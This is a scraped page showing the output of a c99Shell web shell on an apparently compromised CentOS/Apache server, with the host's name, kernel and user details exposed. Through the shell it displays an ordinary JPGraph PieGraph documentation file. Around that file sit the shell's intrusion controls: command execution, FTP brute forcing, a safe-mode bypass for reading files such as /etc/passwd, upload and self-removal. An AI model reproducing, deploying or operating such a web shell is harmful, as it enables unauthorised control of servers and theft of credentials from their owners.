!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PieGraph.html (13.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS PieGraph EXTENDS Graph
(Defined in: jpgraph_pie.php : 1093)
 PieGraph  Graph 
 Add() 
 PieGraph() 
 SetAntiAliasing() 
 SetColor() 
 Stroke() 
Add() 
 AddBand() 
 AddLine() 
 AddText() 
 AddY() 
 AddY2() 
 AdjBackgroundImage() 
 AdjImage() 
 CheckCSIMCache() 
 GetHTMLImageMap() 
 Graph() 
 Set3DPerspective() 
 Set90AndMargin() 
 SetAlphaBlending() 
 SetAngle() 
 SetAxisStyle() 
 SetBackgroundCFlag() 
 SetBackgroundCountryFlag() 
 SetBackgroundGradient() 
 SetBackgroundImage() 
 SetBackgroundImageMix() 
 SetBox() 
 SetClipping() 
SetColor() 
 SetFrame() 
 SetFrameBevel() 
 SetGridDepth() 
 SetIconDepth() 
 SetMargin() 
 SetMarginColor() 
 SetScale() 
 SetShadow() 
 SetTickDensity() 
 SetTitleBackground() 
 SetTitleBackgroundFillStyle() 
 SetY2OrderBack() 
 SetY2Scale() 
 SetYDeltaDist() 
 SetYScale() 
Stroke() 
 StrokeCSIM() 
 StrokeFrameBackground() 
 

Class usage and Overview
The canvas for use with PiePlots. You add pie plots by calling the Add() method.

You can add several PiePlots by adjusting their size and positioning each PiePlot so it doesn't overlap eachother.

 

See also related classes:
PiePlot and PiePlot3D

 


Class Methods

 

 

Add object to the pie graph

ArgumentDefaultDescription
$aObj  Object to add

Description
Add a pieplots or text object to the pie graph. You can specify either a single object or an array. If you specify an array all object in the array must be of the same type.  

Example

$piegraph = new PieGraph(300,400);
$pieplot = new PiePlot($ydata);
$piegraph->Add($pieplot);

 

 

//---------------// CONSTRUCTOR

ArgumentDefaultDescription
$width 300 Width of graph
$height 200 Height of graph
$cachedName "" Cache file name
$timeout 0 Cache timeout in s
$inline 1 Should the image be inline.

Description
See Graph::Graph() 
 
See also
Graph::Graph

Example

$piegraph = new PieGraph(300,400);

 

 

Enable/disable anti-alias for Pie Graphs

ArgumentDefaultDescription
$aFlg true true=enable anti-aliasing

Description
Enable/disable anti-alias for Pie Graphs. This makes for much nicer looking PieGraphs. Please note that enabling anti-alias imposes some restrictions:
  • Enabling anti-alias will severely impact performance. As a rule of thumb you can expect drawing to take 5-8 times longer !
  • You can't use background images or gradient backgrounds together with anti-alias
 

Example

$piegraph->SetAntiAlias();

 

 

Set the background color. Synonym to SetMarginColor()

ArgumentDefaultDescription
$c  Color

Description
Set the background color. Synonym to SetMarginColor() 
 
See also
Graph::Graph

Example

$piegraph->SetColor('gray');

 

 

// Method description

ArgumentDefaultDescription
$aStrokeFileName "" Filename

Description
Stroke the piegraph to the browser or to a specified file if specified. Works exactly the same as Graph::Stroke()  

Example

...
$piegraph->Stroke()



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--